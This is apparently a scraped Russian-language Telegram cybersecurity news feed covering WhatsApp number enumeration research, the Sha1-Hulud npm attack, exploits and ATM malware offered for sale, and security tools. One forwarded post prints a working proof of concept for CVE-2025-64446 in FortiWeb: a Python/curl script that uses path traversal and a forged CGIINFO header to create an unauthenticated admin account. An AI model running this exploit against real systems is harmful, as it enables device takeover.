Media is too big
VIEW IN TELEGRAM
На пленарке форума «Цифровые решения» прозвучал интересный заочный диалог между премьером Михаилом Мишустиным и сооснователем фонда развития кибербезопасности Сайберус Юрием Максимовым. Повод — филологический: стоит ли использовать слово «хакер»?
Премьер предложил более нейтральный термин — «аналитик по уязвимостям». И это можно понять: в массовом сознании «хакер» — это фигура в капюшоне и с закрытым лицом, символ угрозы. Для государства, которое активно вкладывает в развитие цифровых технологий и одновременно отвечает за безопасность и социальную стабильность, важно не подрывать доверие граждан к цифровой среде.
//это не аналитик, он ничего не анализирует, а зачастую тупо просто эсплуатирует чужие наработки.
Однако в профессиональном сообществе кибербезников «хакер» не имеет окраса. «Хакер» – это человек с особым мышлением, который ищет изъяны, уязвимости, несостыковки задекларированного с реальным. Для отрасли этот образ мышления — часть самоидентичности, неотъемлемая составляющая культуры белого взлома.
//в профессиональной среде уже устоялось что хакер это злоумышленник, а белый, черный или фиолетовый - не важно
Странно, если уж применять англицизмы - то почему бы не использовать слово "багхантер"?
Премьер предложил более нейтральный термин — «аналитик по уязвимостям». И это можно понять: в массовом сознании «хакер» — это фигура в капюшоне и с закрытым лицом, символ угрозы. Для государства, которое активно вкладывает в развитие цифровых технологий и одновременно отвечает за безопасность и социальную стабильность, важно не подрывать доверие граждан к цифровой среде.
//это не аналитик, он ничего не анализирует, а зачастую тупо просто эсплуатирует чужие наработки.
Однако в профессиональном сообществе кибербезников «хакер» не имеет окраса. «Хакер» – это человек с особым мышлением, который ищет изъяны, уязвимости, несостыковки задекларированного с реальным. Для отрасли этот образ мышления — часть самоидентичности, неотъемлемая составляющая культуры белого взлома.
//в профессиональной среде уже устоялось что хакер это злоумышленник, а белый, черный или фиолетовый - не важно
Странно, если уж применять англицизмы - то почему бы не использовать слово "багхантер"?
👍3
Forwarded from 1337
Формальный запрет на вход через иностранные сервисы существовал пару лет, но только сейчас к нему решили добавить реальные санкции.
Законопроект уже внесён в Госдуму.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👎2
Forwarded from Proxy Bar
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
*
Ну то есть исходя из ЭТОГО
можно получить такое:
То есть просто получаем нового админа
*
Ну то есть исходя из ЭТОГО
можно получить такое:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
Output from the box:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
То есть просто получаем нового админа
👍3
Forwarded from AGI Security
This media is not supported in your browser
VIEW IN TELEGRAM
AI red teaming плейбук.
Комплексное покрытие
В этом руководстве описывается вся методология Red Teaming с использованием ИИ: от разведки до методов эксплуатации.
Практическое руководство
Основное внимание уделено практическим методам и реальным ситуациям. Каждый раздел содержит практические примеры, которые можно применить на практике.
Фокус на агентов
Сосредоточение на агентном уровне, где взаимодействуют базовые модели, инструменты, конфиденциальные данные и рабочие процессы, позволяет выявлять риски, возникающие на уровне приложений.
Испытано в бою
Применяется в реальных средах для выявления реальных уязвимостей и внедрения практических мер по их устранению.
Комплексное покрытие
В этом руководстве описывается вся методология Red Teaming с использованием ИИ: от разведки до методов эксплуатации.
Практическое руководство
Основное внимание уделено практическим методам и реальным ситуациям. Каждый раздел содержит практические примеры, которые можно применить на практике.
Фокус на агентов
Сосредоточение на агентном уровне, где взаимодействуют базовые модели, инструменты, конфиденциальные данные и рабочие процессы, позволяет выявлять риски, возникающие на уровне приложений.
Испытано в бою
Применяется в реальных средах для выявления реальных уязвимостей и внедрения практических мер по их устранению.
👍4
Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда пытаешься сделать безопаснее
👍10👎1
WhatsApp для поиска контактов по номерам телефонов, вероятно, не имеет ограничения по скорости поиска и не блокируется при множестве обращений, следует из отчета исследователей из Венского университета. Таким образом, они смогли "пробить" 3,5 млрд зарегистрированных телефонных номеров, что в иной ситуации можно было бы назвать крупнейшей утечкой данных в истории.
У WhatsApp есть реестр пользователей, привязанный к их номерам телефонов - это нужно для беспрепятственного поиска контактов. Пользователи могут при установке приложения предоставить разрешение на доступ к своей локальной адресной книге и загрузить ее на серверы WhatsApp, получив в ответ доступ к данным о том, кто из контактов зарегистрирован в мессенджере. Но этим также можно злоупотреблять для проверки, подчеркивают исследователи.
Они разработали метод генерации датасетов с потенциально активными номерами телефонов для 245 стран, и искали контакты с частотой 7 тыс. номеров в секунду. Выявленные 3,5 млрд зарегистрированных в WhatsApp номеров превышают заявленные мессенджером "более 2 млрд". Случаи массовой проверки телефонов были и ранее.
"Поскольку зарегистрированный номер обычно указывает на активное устройство, эти списки являются надежной основой для спама, фишинга или обзвонов ботами. Это поднимает вопрос о том, как долго собранная информация остается актуальной и может быть использована злоумышленниками", - указывают составители материала.
"Так как мы предполагали, что запросы, всегда исходящие от одного IP-адреса и одних и тех же пяти аккаунтов, будут быстро ограничиваться и блокироваться, мы изначально сосредоточились на США, чтобы определить, сколько номеров, утекших в 2019 году, все еще активны. К нашему удивлению, ни IP-адрес, ни наши аккаунты не были заблокированы [за попытки]. Более того, мы не сталкивались с какими-либо ограничениями по скорости", - отмечается в отчете.
Согласно данным по "пробитым" аккаунтам, более 57% пользователей в мире имеют доступную всем фотографию в профиле. 9% глобально - бизнес-аккаунты. В материале также приведены данные по множеству стран. Но исследователи заверили, что их работа - это научное исследование, они не будут ни публиковать "сырые" данные, ни сохранять их после анализа.
У WhatsApp есть реестр пользователей, привязанный к их номерам телефонов - это нужно для беспрепятственного поиска контактов. Пользователи могут при установке приложения предоставить разрешение на доступ к своей локальной адресной книге и загрузить ее на серверы WhatsApp, получив в ответ доступ к данным о том, кто из контактов зарегистрирован в мессенджере. Но этим также можно злоупотреблять для проверки, подчеркивают исследователи.
Они разработали метод генерации датасетов с потенциально активными номерами телефонов для 245 стран, и искали контакты с частотой 7 тыс. номеров в секунду. Выявленные 3,5 млрд зарегистрированных в WhatsApp номеров превышают заявленные мессенджером "более 2 млрд". Случаи массовой проверки телефонов были и ранее.
"Поскольку зарегистрированный номер обычно указывает на активное устройство, эти списки являются надежной основой для спама, фишинга или обзвонов ботами. Это поднимает вопрос о том, как долго собранная информация остается актуальной и может быть использована злоумышленниками", - указывают составители материала.
"Так как мы предполагали, что запросы, всегда исходящие от одного IP-адреса и одних и тех же пяти аккаунтов, будут быстро ограничиваться и блокироваться, мы изначально сосредоточились на США, чтобы определить, сколько номеров, утекших в 2019 году, все еще активны. К нашему удивлению, ни IP-адрес, ни наши аккаунты не были заблокированы [за попытки]. Более того, мы не сталкивались с какими-либо ограничениями по скорости", - отмечается в отчете.
Согласно данным по "пробитым" аккаунтам, более 57% пользователей в мире имеют доступную всем фотографию в профиле. 9% глобально - бизнес-аккаунты. В материале также приведены данные по множеству стран. Но исследователи заверили, что их работа - это научное исследование, они не будут ни публиковать "сырые" данные, ни сохранять их после анализа.
👍5
Злоумышленник, известный как Zeroplayer, выставил на продажу на подпольных хакерских форумах уязвимость удаленного выполнения кода (RCE) нулевого дня в сочетании с возможностью выхода из песочницы, нацеленную на системы Microsoft Office и Windows.
Эксплойт стоимостью 300.000 долларов предположительно работает с большинством форматов файлов Office, включая последние версии, и затрагивает полностью исправленные установки Windows.
Эксплойт стоимостью 300.000 долларов предположительно работает с большинством форматов файлов Office, включая последние версии, и затрагивает полностью исправленные установки Windows.
1👍9
Forwarded from GitHub Community
Vet — это инструмент для обеспечения безопасности цепочки поставок программного обеспечения с открытым исходным кодом, созданный для разработчиков и инженеров по безопасности, которым необходимо:
1. Анализ состава программного обеспечения нового поколения — обнаружение уязвимостей и вредоносных пакетов
2. Политика как код — выражение политик безопасности с использованием CEL
3. Обнаружение вредоносных пакетов в режиме реального времени — на основе активного сканирования SafeDep Cloud
4. Поддержка нескольких экосистем — npm, PyPI, Maven, Go, Docker, GitHub Actions и другие
🐱 GitHub
1. Анализ состава программного обеспечения нового поколения — обнаружение уязвимостей и вредоносных пакетов
2. Политика как код — выражение политик безопасности с использованием CEL
3. Обнаружение вредоносных пакетов в режиме реального времени — на основе активного сканирования SafeDep Cloud
4. Поддержка нескольких экосистем — npm, PyPI, Maven, Go, Docker, GitHub Actions и другие
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Несколько поставщиков средств безопасности (Aikido, HelixGuard, Koi Security, Socket, Step Security и Wiz) подали сигнал тревоги о второй волне атак на реестр npm, напоминающих атаку Shai-Hulud. Новая кампания в цепочке поставок получила название Sha1-Hulud и затронула более 25 000 репозиториев через npm с кражей учетных данных на этапе preinstall. Вредоносные (троянизированные) пакеты npm загрузили в реестр между 21 и 23 ноября 2025 года.
😆 😆 😆
Зараженные репозитории добавляются ежеминутно!
Зараженные репозитории добавляются ежеминутно!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Сицебрекс!
Похоже, что на черном рынке появился продвинутый аналог нашумевшей малвары Котлетос (cutlet maker, написан на Делфи кстати).
Позиционируют как ATM JACKPOTTING MALWARE. Работает через NFC. Удивительно, что не требует подключения физического к банкомату. Еще из удивительного - продавец готов отправить «подготовленный» телефон покупателю вредоносного ПО. Или же отправить инструкцию для как подготовить телефон самостоятельно
Штош, ожидаем новостей о странных поведениях банкоматов?
Позиционируют как ATM JACKPOTTING MALWARE. Работает через NFC. Удивительно, что не требует подключения физического к банкомату. Еще из удивительного - продавец готов отправить «подготовленный» телефон покупателю вредоносного ПО. Или же отправить инструкцию для как подготовить телефон самостоятельно
Штош, ожидаем новостей о странных поведениях банкоматов?
👍5
cybersecurity-forecast-2026-en.pdf
2 MB
Google Cloud опубликовали свой прогноз в области кибербезопасности на 2026 год.
«Прогноз кибербезопасности 2026» посвящен трем ключевым
темам: использование искусственного интеллекта нападющими и защитниками,
киберпреступность как самая разрушительная глобальная угроза и
продолжающиеся действия государственных акторов для достижения своих стратегических целей.
«Прогноз кибербезопасности 2026» посвящен трем ключевым
темам: использование искусственного интеллекта нападющими и защитниками,
киберпреступность как самая разрушительная глобальная угроза и
продолжающиеся действия государственных акторов для достижения своих стратегических целей.
👍4